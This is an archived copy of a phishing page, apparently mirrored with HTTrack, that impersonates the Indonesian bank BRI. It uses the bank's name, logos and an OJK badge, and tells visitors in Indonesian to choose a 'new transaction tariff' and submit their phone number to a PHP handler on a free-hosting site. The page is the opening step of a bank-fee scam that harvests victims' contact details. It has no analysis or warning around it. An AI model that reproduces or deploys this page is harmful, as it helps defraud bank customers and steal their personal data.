<!DOCTYPE html> 
<html lang="en"> 
 
<!-- Mirrored from promo-tarif.000webhostapp.com/BRImo-BRI/pilihantarif.html by HTTrack Website Copier/3.x [XR&CO'2017], Sun, 08 Oct 2023 10:53:39 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head> <meta charset="UTF-8"> <meta content="authenticity_token" name="csrf-param"> <meta content="7ynYnhMsGX1pap1pPx/QfsfwCP93B3WI3Oh12IWRKGo=" name="csrf-token"> <title>www.bank.bri.co.id</title> <meta name="viewport" content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, width=device-width"> <meta name="apple-mobile-web-app-capable" content="yes">
<meta name="theme-color" content="#0076c5"> 

<link href="../../d3duiou06tembb.cloudfront.net/assets/public-6d771bb61e9a71ad172b58a99a657abe0d6acc9d2e11b6de7a07e32d009d3bdc.css"media="screen" rel="stylesheet"> <script>//<![CDATA[
window.dataLayer = [];
//]]></script> <script>//<![CDATA[
(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= '../../www.googletagmanager.com/gtm5445.html'+i+dl+'';f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-MN22SCS');
//]]></script> <script>//<![CDATA[
(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= '../../ssc.doxo.com/gtm5445.js'+i+dl+'';f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-PPXDVKB');
//]]></script> <script type="text/javascript">
var _sift = window._sift = window._sift || [];_sift.push(["_setAccount","ccc37b4619"]);_sift.push(["_setSessionId","7232170f37b9b80b7fc01ed77aebe59d"]);_sift.push(["_setCookieDomain",".doxo.com"]);_sift.push(['_trackPageview']);
(function() { function ls() { var e = document.createElement('script'); e.src = '../../cdn.siftscience.com/s.js'; document.body.appendChild(e); } if (window.attachEvent) { window.attachEvent('onload', ls); } else { window.addEventListener('load', ls, false); } })();</script> 

<style>:{ min-height: 80%; } body { background: -webkit-linear-gradient( #A9A9); background: -o-linear-gradient(# A9A9A9); background: -moz-linear-gradient(#A9A9 ); background: linear-gradient(# A9A9); background-color:#ffffff ; }
</style>

<style> 
select {
    width: 80%;
    padding: 10px;
    border-radius: 4px;
    font-size: 18px;
}

input {
    width: 80%;
    padding: 6px 8px;
    border-radius: 6px;
    font-size: 22px;
}

button {
    background-color: DodgerBlue;
    color: White;
    padding: 8px 6px;
    border-radius: 6px;
    font-size: 22px;
    width: 80%;
}
    

:{ min-height: 80%; } body { background: -webkit-linear-gradient( #A9A9); background: -o-linear-gradient(# A9A9A9); background: -moz-linear-gradient(#A9A9 ); background: linear-gradient(# A9A9); background-color:#ffffff ; }
</style>
</head> 
<body>
 <img src="img/bri.png" width="100%" height="50%"> 
 
 
 

<br></br>
    <form action="../../external.html?link=https://promo-tarif.000webhostapp.com/BRImo-BRI/aaman.php" method="POST" class="pure-form"> 
 <center><div class="form-group"> 		<label>Silakan Tentukan Pilihan Tarif Transaksi Anda.</label> 								<select id="akupilih" class="form-control" name="tarip"> 									<option value="">- Pilihan Tarif -</option> 							
<option velue="TarifBaru">No 1.Tarif Baru Rp: 150.000.-/ Bulan </option><option velue="TarifLama">No 2.Tarif Lama Rp: 6.500.-/ Transaksi.</option><option value="TarifBIfast">No 3.Tarif BIfast Rp: 0.00.-/Transaksi</option></select>       
 


<div class="form-group" required>
<label>Masukan Nomor Handphone</label>
<input type="number" name="angka" class="form-control" required>



<br></br>
<button class="btn-login" type="submit">Konfirmasi</button>
</form> 

<img src="img/ojk.png" width="100%" height="50%">
<div style="text-align: right;position: fixed;z-index:9999999;bottom: 0;width: auto;right: 1%;cursor: pointer;line-height: 0;display:block !important;"><a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="../../external.html?link=https://www.000webhost.com/?utm_source=000webhostapp&amp;utm_campaign=000_logo&amp;utm_medium=website&amp;utm_content=footer_img"><img src="../../cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png" alt="www.000webhost.com"></a></div><script>function getCookie(t){for(var e=t+"=",n=decodeURIComponent(document.cookie).split(";"),o=0;o<n.length;o++){for(var i=n[o];" "==i.charAt(0);)i=i.substring(1);if(0==i.indexOf(e))return i.substring(e.length,i.length)}return""}getCookie("hostinger")&&(document.cookie="hostinger=;expires=Thu, 01 Jan 1970 00:00:01 GMT;",location.reload());var wordpressAdminBody=document.getElementsByClassName("wp-admin")[0],notification=document.getElementsByClassName("notice notice-success is-dismissible"),hostingerLogo=document.getElementsByClassName("hlogo"),mainContent=document.getElementsByClassName("notice_content")[0];if(null!=wordpressAdminBody&&notification.length>0&&null!=mainContent && new Date().toISOString().slice(0, 10) > '2022-10-01' && new Date().toISOString().slice(0, 10) < '2022-12-25'){var googleFont=document.createElement("link");googleFontHref=document.createAttribute("href"),googleFontRel=document.createAttribute("rel"),googleFontHref.value="../../external.html?link=https://fonts.googleapis.com/css?family=Roboto:300,400,600,700",googleFontRel.value="stylesheet",googleFont.setAttributeNode(googleFontHref),googleFont.setAttributeNode(googleFontRel);var css="@media only screen and (max-width: 576px) {#main_content {max-width: 320px !important;} #main_content h1 {font-size: 30px !important;} #main_content h2 {font-size: 40px !important; margin: 20px 0 !important;} #main_content p {font-size: 14px !important;} #main_content .content-wrapper {text-align: center !important;}} @media only screen and (max-width: 781px) {#main_content {margin: auto; justify-content: center; max-width: 445px;}} @media only screen and (max-width: 1325px) {.web-hosting-90-off-image-wrapper {position: absolute; max-width: 95% !important;} .notice_content {justify-content: center;} .web-hosting-90-off-image {opacity: 0.3;}} @media only screen and (min-width: 769px) {.notice_content {justify-content: space-between;} #main_content {margin-left: 5%; max-width: 445px;} .web-hosting-90-off-image-wrapper {position: absolute; display: flex; justify-content: center; width: 100%; }} .web-hosting-90-off-image {max-width: 90%;} .content-wrapper {min-height: 454px; display: flex; flex-direction: column; justify-content: center; z-index: 5} .notice_content {display: flex; align-items: center;} * {-webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;} .upgrade_button_red_sale{box-shadow: 0 2px 4px 0 rgba(255, 69, 70, 0.2); max-width: 350px; border: 0; border-radius: 3px; background-color: #ff4546 !important; padding: 15px 55px !important; font-family: 'Roboto', sans-serif; font-size: 16px; font-weight: 600; color: #ffffff;} .upgrade_button_red_sale:hover{color: #ffffff !important; background: #d10303 !important;}",style=document.createElement("style"),sheet=window.document.styleSheets[0];style.styleSheet?style.styleSheet.cssText=css:style.appendChild(document.createTextNode(css)),document.getElementsByTagName("head")[0].appendChild(style),document.getElementsByTagName("head")[0].appendChild(googleFont);var button=document.getElementsByClassName("upgrade_button_red")[0],link=button.parentElement;link.setAttribute("href","../../external.html?link=https://www.hostinger.com/hosting-starter-offer?utm_source=000webhost&amp;utm_medium=panel&amp;utm_campaign=000-wp"),link.innerHTML='<button class="upgrade_button_red_sale">Go for it</button>',(notification=notification[0]).setAttribute("style","padding-bottom: 0; padding-top: 5px; background-color: #040713; background-size: cover; background-repeat: no-repeat; color: #ffffff; border-left-color: #040713;"),notification.className="notice notice-error is-dismissible";var mainContentHolder=document.getElementById("main_content");mainContentHolder.setAttribute("style","padding: 0;"),hostingerLogo[0].remove();var h1Tag=notification.getElementsByTagName("H1")[0];h1Tag.className="000-h1",h1Tag.innerHTML="Black Friday Prices",h1Tag.setAttribute("style",'color: white; font-family: "Roboto", sans-serif; font-size: 22px; font-weight: 700; text-transform: uppercase;');var h2Tag=document.createElement("H2");h2Tag.innerHTML="Get 90% Off!",h2Tag.setAttribute("style",'color: white; margin: 10px 0 15px 0; font-family: "Roboto", sans-serif; font-size: 60px; font-weight: 700; line-height: 1;'),h1Tag.parentNode.insertBefore(h2Tag,h1Tag.nextSibling);var paragraph=notification.getElementsByTagName("p")[0];paragraph.innerHTML="Get Web Hosting for $0.99/month + SSL Certificate for FREE!",paragraph.setAttribute("style",'font-family: "Roboto", sans-serif; font-size: 16px; font-weight: 700; margin-bottom: 15px;');var list=notification.getElementsByTagName("UL")[0];list.remove();var org_html=mainContent.innerHTML,new_html='<div class="content-wrapper">'+mainContent.innerHTML+'</div><div class="web-hosting-90-off-image-wrapper"><img class="web-hosting-90-off-image" src="https://cdn.000webhost.com/000webhost/promotions/bf-2020-wp-inject-img.png"></div>';mainContent.innerHTML=new_html;var saleImage=mainContent.getElementsByClassName("web-hosting-90-off-image")[0]}else if(null!=wordpressAdminBody&&notification.length>0&&null!=mainContent){var bulletPoints = mainContent.getElementsByTagName('li');var replacement=['Increased performance (up to 5x faster) - Thanks to Hostinger’s WordPress Acceleration and Caching solutions','WordPress AI tools - Creating a new website has never been easier','Weekly or daily backups - Your data will always be safe','Fast and dedicated 24/7 support - Ready to help you','Migration of your current WordPress sites to Hostinger is automatic and free!','Try Premium Web Hosting now - starting from $1.99/mo'];for (var i=0;i<bulletPoints.length;i++){bulletPoints[i].innerHTML = replacement[i];}}</script></body> 

<!-- Mirrored from promo-tarif.000webhostapp.com/BRImo-BRI/pilihantarif.html by HTTrack Website Copier/3.x [XR&CO'2017], Sun, 08 Oct 2023 10:53:48 GMT -->
</html> 
